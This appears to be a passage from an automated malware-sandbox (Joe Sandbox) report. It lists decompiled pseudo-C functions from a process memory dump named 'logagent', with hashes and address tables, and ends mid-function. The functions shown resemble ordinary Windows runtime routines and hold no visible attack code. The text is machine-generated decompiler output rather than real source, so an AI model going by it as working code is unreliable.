                                              0x05236a7d
                                              0x05236a86
                                              0x05236a89
                                              0x05236a9c
                                              0x05236a9f
                                              0x05236aa2
                                              0x05236aa5
                                              0x05236aaf
                                              0x05236ab1
                                              0x05236ab8
                                              0x05236ab9
                                              0x05236abb
                                              0x05236abe
                                              0x05236ac5
                                              0x05236ac5
                                              0x05236aaf
                                              0x05236a40
                                              0x05236a26
                                              0x052369fe
                                              0x05236ace
                                              0x05236ad0
                                              0x05236ad3
                                              0x05236ad8
                                              0x05236adf
                                              0x05236adf
                                              0x05236ae8
                                              0x05236aef
                                              0x05236aef
                                              0x05236af9
                                              0x05236b06

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c8f953489ed0d4b364818b20a37af0172470d58c4c4c9597ab8e8dfa0ddeba67
                                              • Instruction ID: e485111c54c12e23e2c418ee88fc8f60dfc9245a9bd1d973f54fec75bd5aade9
                                              • Opcode Fuzzy Hash: c8f953489ed0d4b364818b20a37af0172470d58c4c4c9597ab8e8dfa0ddeba67
                                              • Instruction Fuzzy Hash: E3419AB1E00208AFDB24DFA4D845BFEBBF9FF48714F14812AE919A7251DB74A905CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051B5210 Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E051B5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E051B52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E051F95D0();
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E051CEB70(_t54, 0x52a79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E051F95D0();
								L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E051CEB70(_t54, 0x52a79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E051FF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E051CEB70(_t54, 0x52a79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E051F95D0();
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                              0x051b5220
                                              0x051b5224
                                              0x05210d13
                                              0x05210d16
                                              0x05210d19
                                              0x051b522a
                                              0x051b522a
                                              0x051b522d
                                              0x051b522d
                                              0x051b5231
                                              0x051b5235
                                              0x051b5239
                                              0x05210d5c
                                              0x05210d62
                                              0x00000000
                                              0x00000000
                                              0x05210d6a
                                              0x05210d7b
                                              0x05210d7f
                                              0x05210d81
                                              0x05210d84
                                              0x05210d95
                                              0x05210d95
                                              0x05210d6c
                                              0x05210d71
                                              0x05210d71
                                              0x05210d9a
                                              0x00000000
                                              0x051b524a
                                              0x051b524a
                                              0x051b5250
                                              0x05210d24
                                              0x05210d35
                                              0x05210d39
                                              0x05210d3b
                                              0x05210d3e
                                              0x05210d50
                                              0x05210d50
                                              0x05210d26
                                              0x05210d2b
                                              0x05210d2b
                                              0x00000000
                                              0x05210d55
                                              0x051b5256
                                              0x051b525b
                                              0x051b5265
                                              0x05210da7
                                              0x051b526b
                                              0x051b526e
                                              0x051b5272
                                              0x05210db1
                                              0x05210db4
                                              0x05210dc5
                                              0x05210dc5
                                              0x051b5272
                                              0x051b5278
                                              0x051b527e
                                              0x051b528a
                                              0x051b528c
                                              0x051b528d
                                              0x00000000
                                              0x051b5280
                                              0x051b5282
                                              0x051b5288
                                              0x051b529f
                                              0x051b5292
                                              0x00000000
                                              0x051b5292
                                              0x00000000
                                              0x051b5288
                                              0x051b527e

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a82a5c1f830739dc0d4670a66111b9dd61dce8126a460929324d5f22ab6c6820
                                              • Instruction ID: 8e8aacf0c2c7983a234c823a572883a2abc91a51ae9ffb65795a9875ae6f62a1
                                              • Opcode Fuzzy Hash: a82a5c1f830739dc0d4670a66111b9dd61dce8126a460929324d5f22ab6c6820
                                              • Instruction Fuzzy Hash: 0E312C31265601DBDB36AF14C888F7777B6FF107A0F12465AE81A4B1A1E770E841C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F3D43 Relevance: .1, Instructions: 106COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051F3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E051C7B60(0, _t61, 0x51911c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E051C7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L051D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                              0x051f3d4c
                                              0x051f3d50
                                              0x051f3d55
                                              0x051f3d5e
                                              0x0522e79a
                                              0x00000000
                                              0x0522e79a
                                              0x051f3d68
                                              0x0522e789
                                              0x051f3d9d
                                              0x051f3da3
                                              0x051f3daf
                                              0x051f3db5
                                              0x051f3dbc
                                              0x051f3dc4
                                              0x051f3dc9
                                              0x051f3dce
                                              0x0522e7ae
                                              0x0522e7ae
                                              0x051f3dde
                                              0x051f3de2
                                              0x051f3de7
                                              0x051f3e0d
                                              0x051f3e13
                                              0x051f3e16
                                              0x051f3e1e
                                              0x051f3e25
                                              0x051f3e28
                                              0x00000000
                                              0x00000000
                                              0x051f3e2a
                                              0x051f3e2f
                                              0x051f3e37
                                              0x051f3e37
                                              0x00000000
                                              0x051f3e37
                                              0x051f3e31
                                              0x00000000
                                              0x051f3e31
                                              0x051f3e20
                                              0x051f3e20
                                              0x051f3e35
                                              0x00000000
                                              0x051f3de9
                                              0x051f3de9
                                              0x051f3de9
                                              0x051f3dee
                                              0x051f3dfd
                                              0x051f3dff
                                              0x051f3e02
                                              0x051f3e05
                                              0x051f3e05
                                              0x00000000
                                              0x051f3df0
                                              0x051f3de7
                                              0x0522e78f
                                              0x0522e794
                                              0x051f3d79
                                              0x051f3d84
                                              0x051f3d89
                                              0x051f3d8e
                                              0x00000000
                                              0x0522e7a4
                                              0x051f3d96
                                              0x051f3d9a
                                              0x00000000
                                              0x051f3d9a
                                              0x00000000
                                              0x0522e794
                                              0x051f3d6e
                                              0x051f3d73
                                              0x00000000
                                              0x0522e7b5
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a71f05e253657a66df982255e5144f6a6ab8ba1337563cb409a40d944945abe5
                                              • Instruction ID: 03ed54040ed26902550e5f49193b7b674c4f3a2f16163ceba4edfa6045bed46c
                                              • Opcode Fuzzy Hash: a71f05e253657a66df982255e5144f6a6ab8ba1337563cb409a40d944945abe5
                                              • Instruction Fuzzy Hash: 8931D035A05621DBC738CF29C881A7ABBE6FF45700B06886EE95ACB351E730D881C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EA61C Relevance: .1, Instructions: 106COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E051EA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x5290220);
				E0520D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x52a7b9c; // 0x0
				_t55 = L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0520D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x52a7b10 =  *0x52a7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x52a536c; // 0x345b320
					if( *_t51 != 0x52a5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x52a5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x52a536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E051EA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                              0x051ea61c
                                              0x051ea61e
                                              0x051ea623
                                              0x051ea628
                                              0x051ea62b
                                              0x051ea62d
                                              0x051ea648
                                              0x051ea64a
                                              0x051ea64f
                                              0x05229b44
                                              0x051ea6ec
                                              0x051ea6f1
                                              0x051ea6f1
                                              0x051ea655
                                              0x051ea657
                                              0x051ea65a
                                              0x051ea65d
                                              0x051ea662
                                              0x051ea663
                                              0x051ea667
                                              0x051ea668
                                              0x051ea66d
                                              0x051ea706
                                              0x051ea706
                                              0x05229bda
                                              0x05229be6
                                              0x05229beb
                                              0x00000000
                                              0x05229beb
                                              0x051ea679
                                              0x05229b7a
                                              0x00000000
                                              0x05229b7a
                                              0x051ea683
                                              0x051ea6f4
                                              0x051ea6f7
                                              0x051ea6f9
                                              0x051ea6fd
                                              0x051ea6a0
                                              0x051ea6a0
                                              0x051ea6ad
                                              0x051ea6af
                                              0x051ea6b4
                                              0x05229ba7
                                              0x05229bac
                                              0x00000000
                                              0x00000000
                                              0x05229bc6
                                              0x05229bce
                                              0x05229bd1
                                              0x05229bd3
                                              0x05229bd3
                                              0x00000000
                                              0x05229bd1
                                              0x051ea6bd
                                              0x051ea6c3
                                              0x051ea6c6
                                              0x051ea6d2
                                              0x051ea701
                                              0x051ea704
                                              0x00000000
                                              0x051ea704
                                              0x051ea6d4
                                              0x051ea6d6
                                              0x051ea6d9
                                              0x051ea6db
                                              0x051ea6e1
                                              0x051ea6e6
                                              0x051ea6e8
                                              0x051ea6e8
                                              0x051ea6ea
                                              0x00000000
                                              0x051ea6ea
                                              0x051ea688
                                              0x051ea692
                                              0x051ea694
                                              0x051ea699
                                              0x00000000
                                              0x00000000
                                              0x051ea69d
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a72ef8aee707b59b32afa2359c4dc5357e0039f40e4f144bb11f8c8c0c716fa
                                              • Instruction ID: 68ec78735709a00e2987a36c96d48f84d1f6c3ccfb3e1c8089542d8681b70039
                                              • Opcode Fuzzy Hash: 2a72ef8aee707b59b32afa2359c4dc5357e0039f40e4f144bb11f8c8c0c716fa
                                              • Instruction Fuzzy Hash: 3D419CB9A14215EFCB19CF58D494B9ABBF2FF4A300F1980A9E805AB385C775A941CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051DC182 Relevance: .1, Instructions: 104COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 68%
                                              			E051DC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E051D7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E05288D34(_v8, _t80);
					}
					E051D2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E051CFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E05288833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E051CFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E051FB180();
						if(_a4 != 0) {
							E051D2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E051DBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E051DBB2D(_t16, _t15);
						E051DB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E051CFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E051CFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E051CFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                              0x051dc18d
                                              0x051dc18f
                                              0x051dc191
                                              0x051dc19b
                                              0x051dc1a0
                                              0x051dc1d4
                                              0x051dc1de
                                              0x05222d6e
                                              0x051dc1e4
                                              0x051dc1e4
                                              0x051dc1e4
                                              0x051dc1ec
                                              0x05222d7d
                                              0x05222d7d
                                              0x051dc1f3
                                              0x051dc1ff
                                              0x05222d88
                                              0x05222d8d
                                              0x05222d94
                                              0x05222d94
                                              0x05222d9f
                                              0x05222da4
                                              0x05222dab
                                              0x05222db0
                                              0x05222db2
                                              0x05222db3
                                              0x05222db4
                                              0x05222dbc
                                              0x05222dc3
                                              0x05222dc3
                                              0x051dc205
                                              0x051dc205
                                              0x051dc208
                                              0x051dc20e
                                              0x051dc211
                                              0x051dc216
                                              0x051dc219
                                              0x051dc21f
                                              0x051dc222
                                              0x051dc22c
                                              0x051dc234
                                              0x051dc23a
                                              0x051dc23f
                                              0x051dc245
                                              0x051dc24b
                                              0x051dc251
                                              0x051dc25a
                                              0x051dc276
                                              0x051dc27d
                                              0x051dc27d
                                              0x051dc25c
                                              0x051dc25c
                                              0x00000000
                                              0x051dc25e
                                              0x051dc1a4
                                              0x051dc1aa
                                              0x051dc1b3
                                              0x051dc265
                                              0x051dc26c
                                              0x051dc26c
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                              • Instruction ID: b845e1db25468cc8a2822395cc3cc33ce23933ef195ef5951da2d097c6957281
                                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                              • Instruction Fuzzy Hash: FC31147270558ABAD708EBB4C484BE9FB55BF52204F04415AD41D47242DB396E06CBF0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05237016 Relevance: .1, Instructions: 104COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E05237016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x52ad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E05236B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E05236B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E051D7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E051F9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E051FB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L051D4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                              0x05237016
                                              0x0523701e
                                              0x0523702b
                                              0x05237033
                                              0x05237037
                                              0x0523703c
                                              0x0523703e
                                              0x05237041
                                              0x05237045
                                              0x0523704a
                                              0x05237050
                                              0x05237055
                                              0x0523705a
                                              0x05237062
                                              0x05237062
                                              0x0523705a
                                              0x05237064
                                              0x05237064
                                              0x05237067
                                              0x05237071
                                              0x05237096
                                              0x0523709b
                                              0x052370a2
                                              0x052370a6
                                              0x052370a7
                                              0x052370ad
                                              0x052370b3
                                              0x052370b6
                                              0x052370bb
                                              0x052370c3
                                              0x052370c3
                                              0x052370c6
                                              0x052370cd
                                              0x052370dd
                                              0x052370e0
                                              0x052370e2
                                              0x052370e2
                                              0x052370ee
                                              0x05237101
                                              0x052370f0
                                              0x052370f9
                                              0x052370f9
                                              0x0523710a
                                              0x0523710e
                                              0x05237112
                                              0x05237117
                                              0x05237118
                                              0x05237118
                                              0x052370bb
                                              0x0523711d
                                              0x05237123
                                              0x05237131
                                              0x05237131
                                              0x05237136
                                              0x0523713d
                                              0x0523713e
                                              0x0523713f
                                              0x0523714a
                                              0x0523714a
                                              0x05237084
                                              0x05237088
                                              0x00000000
                                              0x0523708e
                                              0x0523708e
                                              0x05237092
                                              0x00000000
                                              0x05237092

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08332c6ba295aaf7e3a34d1157692ee129a578e496aeb0be2b9136fba6259796
                                              • Instruction ID: 8877721f0566cd55e6afd03ecc4c4e74f3c78dd70f5ec2985cc33ad09a153c36
                                              • Opcode Fuzzy Hash: 08332c6ba295aaf7e3a34d1157692ee129a578e496aeb0be2b9136fba6259796
                                              • Instruction Fuzzy Hash: 7D31C8B26187519BC711DF28C845B6AB7E5FF88700F044A19F89A97691E730E904CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F6DE6 Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E051F6DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E051F6EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
